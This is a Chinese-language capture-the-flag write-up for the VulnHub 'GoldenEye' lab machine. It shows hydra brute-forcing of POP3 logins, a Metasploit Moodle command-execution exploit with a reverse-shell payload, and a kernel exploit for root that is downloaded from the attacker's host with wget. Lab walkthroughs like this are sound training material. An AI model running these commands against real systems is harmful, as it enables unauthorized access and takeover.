Vulhub - Goldeneye 黄金眼！

靶机地址：https://www.vulnhub.com/entry/goldeneye-1,240/

目标：得到root权限&找到flag.txt

信息收集

arp-scan & nmap

arp-scan -l

192.168.47.188

扫描端口服务

80端口 - HTTP服务25端口 - 看到了SMTP(邮件)55006 55007这么靠后的端口，不知道是什么服务，看到了mail字眼(邮件)

访问网站+扫描目录

提示信息 sev-home 目录 --- 访问 --- 登录框

回初始页面，打开源代码，查看terminal.js文件，发现有一个编码数据

放在随波逐流上跑了一下，HTML解码给出结果Boris-InvincibleHack3r但是去sev-home页面登录发现不正确。。。发现是大小写的问题: 注释中的信息写人名大写了boris-InvincibleHack3r

成功登录进去，一堆英文，翻译之后，发现是pop3服务（邮件相关），与查到的端口服务相呼应 55006 55007 25端口

但是没其他信息了，如何利用？

hydra & nc & whatweb

hydra工具爆破密码，账户是boris肯定的，还有一个natalya

echo -e 'borisnnatalya' > user.txt --- 生成一个user.txt文件，里面存放用户名

然后使用字典爆破 --- 55006端口没有结果

hydra -L dayu.txt -P /usr/share/wordlists/fasttrack.txt 192.168.4.202 -s 55007 pop3[55007][pop3] host: 192.168.47.188   login: natalya   password: bird[55007][pop3] host: 192.168.47.188   login: boris   password: secret1!

然后nc连接pop3服务

nc 192.168.47.188 55007user boris # user登录命令pass secret1! # pass 输入密码list # 列出来邮件retr 1 # 查看 1对应编号retr 2retr 3

过一遍信息

然后登录进natalya的账户，其中一封邮件中有一个账号密码

username: xeniapassword: RCP90rulez!

还告诉了域名信息

网址：severnaya-station.com/gnocertdir 我们现根据邮件提示添加本地域名：severnaya-station.com

设置本地HOSTS文件vim /etc/hosts192.168.4.202 severnaya-station.com

whatweb severnaya-station.com/gnocertdir --- 指纹搜索网站信息

直接以域名访问，本机无法访问，我在虚拟机中成功访问，上面有账号密码登录进去

发现有一个doak的用户

hydra -l doak -P /usr/share/wordlists/fasttrack.txt 192.168.47.188 -s 55007 pop3

[55007][pop3] host: 192.168.47.188   login: doak   password: goat

doak-goat

流程与上面一样，nc连接pop3服务，查看doak用户下的邮件 --- 只有一封邮件

发现一个账号和密码username: dr_doakpassword: 4England!

访问刚才的域名，用这个用户登录进去

发现一个secret文件，说是给出了一个图片路径（里面有关管理员的信息）

访问图片路径，下载下来

图片属性有base64编码数据，解码得到明文，猜测是admin的密码 --- 尝试

admin-xWinter1995x!

在网站中成功登录进去，信息太多了

框架是Moodle版本是2.2.3 --- 去搜索可用漏洞

msfconosole

msfconsole                        ---进入MSF框架攻击界面search moodle                     ---查找 moodle类型 攻击的模块use 1                             ---调用0  exploit/multi/http/moodle_cmd_exec调用攻击脚本set username admin                ---设置用户名：adminset password xWinter1995x!        ---设置密码：xWinter1995x!set rhost severnaya-station.com   ---设置：rhosts severnaya-station.comset targeturi /gnocertdir         ---设置目录： /gnocertdirset payload cmd/unix/reverse      ---设置payload：cmd/unix/reverseset lhost 192.168.4.231           ---设置：lhost 192.168.4.231（需要本地IP）exploit  ----执行命令

show options中的的 yes部分要全部set好

这里需要去网站中修改一下终端信息 Home /  Site administration  /   Plugins /   Text editors  /   TinyMCE HTML editor 修改成PSpellShell保存

然后回msf中run或者exploit一下即可

python -c 'import pty; pty.spawn("/bin/bash")'     ---将shell进行tty

提权

常用命令

uname -afind / -perm -u=s -type f 2>/dev/nullsudo -l

内核漏洞（uname -a）

在本地的exp库中搜索一下没有搜到，去谷歌一下uname -a的信息在exploit-db网站中找到了编号

然后searchsploit 编号获取exp.c然后根据提示一步步做就行了

修改一些东西(靶机中没有gcc文件)：将exp.c中的140多行有个gcc改为cc

然后通过python开启http服务：``python -m http.server 8001` --- 在8001端口下开启了http访问

在靶机中通过wget http://IP/编号.c

获取 exp.c文件然后 cc -o exp 编号.c 编译一下，

chmod +x 添加执行权限

运行得到root权限